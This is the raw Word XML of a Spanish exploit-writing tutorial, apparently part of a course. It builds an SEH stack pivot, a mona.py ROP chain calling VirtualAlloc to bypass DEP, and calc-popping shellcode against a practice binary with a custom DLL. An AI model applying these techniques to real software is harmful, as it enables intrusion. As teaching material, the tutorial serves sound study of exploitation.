            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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317" cy="2032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D91E4" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A2BA95" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">Después corro el agafi poniendo el nombre del dump que hice antes, que lo guardo en la misma carpeta y el nombre de un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> de salida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DCCF68" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0D841F" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">agafi.exe objective.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dumped.dmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pepe.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D929412" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B475C37" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Encontró algunos gadget raros pero el problema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9967A" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13FEA0C3" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>----------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6A1589" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[x] Valid gadget at: 7801194e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C8E131" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>matchs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=[esp+0x8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F73E606" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--&gt; stack used: N/A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4C4A20" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; preserved registers: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C46E36" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00795E7E" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00795E7E">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">*** 7801194e: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00795E7E">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3BC4FD7C" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00795E7E" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00795E7E">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">*** 7801194f: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00795E7E">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>popa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F3D5F28" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00795E7E" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00795E7E">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">*** 78011950: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00795E7E">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00795E7E">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x7801195a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40784498" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">*** 7801195a: pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="60EC447F" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*** 7801195b: leave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630CAEB3" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00795E7E" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00795E7E">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>*** 7801195c: ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7896FED0" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00795E7E" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53BA6015" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Es que</w:t>
      </w:r>
      <w:r w:rsidR="00F75CAD">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> después de ejecutarlo ESP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> queda apuntando nuevamente justo al SEH y vuelve a saltar al mismo gadget y se rompe en la segunda vez por un valor de EBP 0x41414141 que pasa a ESP en el LEAVE-RET.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004DC79" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458AD570" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Bueno para poder terminarlo y demostrar cómo se hace, le agregare una instrucción ADD ESP, XXXX -RET al Mypepe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2B0E76" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D6D0D5" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="684D3391" wp14:editId="74C02A93">
            <wp:extent cx="2747963" cy="1214636"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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214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660E9" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719082D7" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Usaremos ese como gadget para saltar desde el SEH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF854C9" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D98568" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27DF86DA" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45452925" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0B2E2EA2" wp14:editId="05BFBF9E">
            <wp:extent cx="2159318" cy="1757737"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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318" cy="1757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84304" w14:textId="77777777" w:rsidR="00F844F7" w:rsidRDefault="00F844F7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343FAA60" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Probemos saltar ahí cuando crashea, manejando la excepción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0977E804" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580C8B56" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C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2826BDCF" wp14:editId="714C6485">
            <wp:extent cx="5731200" cy="195580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A50AF" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62063FBC" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Vemos que después de ejecutar el ADD ESP, 700 ya me queda para continuar allí con el ROP y luego el shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C7FA5F" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26DCD7A5" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Vemos la distancia donde debe ir el ROP aquí estoy en ESP=0xeff5c0 y veamos donde empieza mi data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01499336" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA12FEB" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1AB9369C" wp14:editId="4E70AE8D">
            <wp:extent cx="2581275" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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83825" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4EA681" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Empieza en 0xeff4d4 puedo hacer la resta y ver la distancia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A566C25" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707F93A4" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="53E533AF" wp14:editId="1AFC9FF6">
            <wp:extent cx="2718118" cy="1814488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118" cy="1814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FF05D" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC50E4E" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Armo el script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C29D1B" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2911D553" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C3193B1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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os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import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*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FBAC2B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import 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>struct</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4608B04F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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>create_rop_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>chain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>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56609380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 rop chain generated with mona.py - www.corelan.be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5207764E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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rop_gadgets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 = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03528241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0x7801eb</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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94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POP EBP # RETN [Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5BAB04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0x7801eb</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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94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skip 4 bytes [Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABC8329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0x7801ee</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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74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POP EBX # RETN [Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D008A0C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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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00000001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0x00000001-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58BCB324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0x7802920</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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e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POP EDX # RETN [Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A31628A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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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00001000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0x00001000-&gt; edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E28A4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0x7800a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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849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POP ECX # RETN [Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5589F39E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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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00000040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0x00000040-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2853DEA6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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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78028756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POP EDI # RETN [Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34914F83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0x7800b</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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281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RETN (ROP NOP) [Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A419D3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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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78001492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POP ESI # RETN [Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437F8733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0x780041</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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ed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JMP [EAX] [Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E727750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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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78013953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POP EAX # RETN [Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5857EBFD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0x7802e</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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030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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ptr</w:t>
      </w:r>
      <w:proofErr w:type="spell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to &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spell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() [IAT Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40051E07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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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78009791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PUSHAD # ADD AL,80 # RETN [Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5DD992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0x7800f7c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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1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 </w:t>
      </w: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#</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ptr</w:t>
      </w:r>
      <w:proofErr w:type="spell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to 'push </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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# ret ' [Mypepe.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E708682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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE52C93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return 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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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.join</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>struct.pack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>(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'&lt;I'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_) </w:t>
      </w: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for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_ </w:t>
      </w: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in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rop_gadgets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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEBED48" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FA8997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highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>shellcode =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\xB8\x40\x50\x03\x78\xC7\x40\x04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+ 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"calc"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+ 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\x83\xC0\x04\x50\x68\x24\x98\x01\x78\x59\xFF\xD1\x68\xAB\x39\x00\x78\xC3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</w:p>
    <w:p w14:paraId="4A7D6D07" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48CC7318" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/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>stdin,stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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 = popen4(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r'CANARY_con_DEP.exe -1'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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6668397B" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000080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"ATACHEA EL DEBUGGER Y APRETA ENTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000080"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>\n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</w:t>
      </w:r>
    </w:p>
